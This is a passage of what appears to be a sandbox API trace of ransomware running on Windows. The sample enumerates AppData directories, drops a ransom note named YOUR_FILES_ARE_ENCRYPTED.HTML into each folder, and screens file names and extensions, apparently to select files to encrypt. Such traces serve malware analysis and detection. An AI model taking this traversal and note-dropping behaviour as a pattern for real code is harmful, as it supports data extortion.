cAlternateFileName="TEMPOR~1")) returned 1 [0164.765] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files") returned 62 [0164.765] GetProcessHeap () returned 0x270000 [0164.765] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0164.767] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files" [0164.767] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files\\*" [0164.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xb14d9ec0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb14d9ec0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb14d9ec0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DFB260B44B84FD6F03.TMP", cAlternateFileName="Hݞ")) returned 0xffffffff [0164.767] GetProcessHeap () returned 0x270000 [0164.768] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.768] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd2dae310, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0164.768] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore") returned 50 [0164.768] GetProcessHeap () returned 0x270000 [0164.768] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0164.768] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore" [0164.768] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore\\*" [0164.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd2dae310, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0164.769] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd2dae310, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0164.769] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd2dae310, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 0 [0164.769] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0164.769] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0164.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\virtualstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0164.770] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0164.773] CloseHandle (hObject=0x598) returned 1 [0164.773] GetProcessHeap () returned 0x270000 [0164.774] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.774] FindNextFileW (in: hFindFile=0x42f3180, 
lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd2dae310, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0164.774] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0164.774] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0164.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0164.775] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0164.778] CloseHandle (hObject=0x5a4) returned 1 [0164.778] GetProcessHeap () returned 0x270000 [0164.779] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0164.779] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0164.779] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow") returned 40 [0164.779] GetProcessHeap () returned 0x270000 [0164.779] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0164.779] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow" [0164.779] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\*" [0164.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0164.780] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.780] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 
| out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xaee77c00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee77c00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0164.780] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft") returned 50 [0164.780] GetProcessHeap () returned 0x270000 [0164.780] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0164.780] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft" [0164.780] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\*" [0164.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xaee77c00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee77c00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0164.780] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xaee77c00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee77c00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.780] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0164.780] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned 67 [0164.780] GetProcessHeap () returned 0x270000 [0164.780] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0164.781] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" [0164.781] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*" [0164.781] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0164.782] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.782] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Content", cAlternateFileName="")) returned 1 [0164.782] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned 75 [0164.782] GetProcessHeap () returned 0x270000 [0164.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0164.785] lstrcpyW (in: lpString1=0x7690008, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" [0164.785] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*" [0164.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0164.785] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.785] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1b2bced0, ftCreationTime.dwHighDateTime=0x1d706a4, 
ftLastAccessTime.dwLowDateTime=0x1b2bced0, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1b2bced0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x475, dwReserved0=0x0, dwReserved1=0x60, cFileName="37C951188967C8EB88D99893D9D191FE", cAlternateFileName="37C951~1")) returned 1 [0164.785] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37C951188967C8EB88D99893D9D191FE") returned 108 [0164.785] lstrcmpW (lpString1="37C951188967C8EB88D99893D9D191FE", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.785] PathFindExtensionW (pszPath="37C951188967C8EB88D99893D9D191FE") returned="" [0164.785] lstrlenW (lpString="") returned 0 [0164.786] PathFindExtensionW (pszPath="37C951188967C8EB88D99893D9D191FE") returned="" [0164.786] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x195ba2b0, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x195ba2b0, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x195ba2b0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x12bb, dwReserved0=0x0, dwReserved1=0x60, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0164.786] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 108 [0164.786] lstrcmpW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.786] PathFindExtensionW (pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0164.786] lstrlenW (lpString="") returned 0 [0164.786] PathFindExtensionW 
(pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0164.786] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x70be18f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x70be18f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x70be18f0, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x30d, dwReserved0=0x0, dwReserved1=0x60, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0164.786] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned 108 [0164.786] lstrcmpW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.786] PathFindExtensionW (pszPath="696F3DE637E6DE85B458996D49D759AD") returned="" [0164.786] lstrlenW (lpString="") returned 0 [0164.786] PathFindExtensionW (pszPath="696F3DE637E6DE85B458996D49D759AD") returned="" [0164.786] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x25285390, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x234, dwReserved0=0x0, dwReserved1=0x60, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0164.786] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 108 [0164.786] lstrcmpW 
(lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.786] PathFindExtensionW (pszPath="7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0164.786] lstrlenW (lpString="") returned 0 [0164.786] PathFindExtensionW (pszPath="7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0164.786] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x17fb5730, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x17fb5730, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x17fb5730, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0xe6fe, dwReserved0=0x0, dwReserved1=0x60, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0164.786] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506") returned 108 [0164.786] lstrcmpW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.786] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0164.787] lstrlenW (lpString="") returned 0 [0164.787] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0164.787] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x60decdd0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x60decdd0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x60decdd0, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xe6fe, dwReserved0=0x0, dwReserved1=0x60, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 
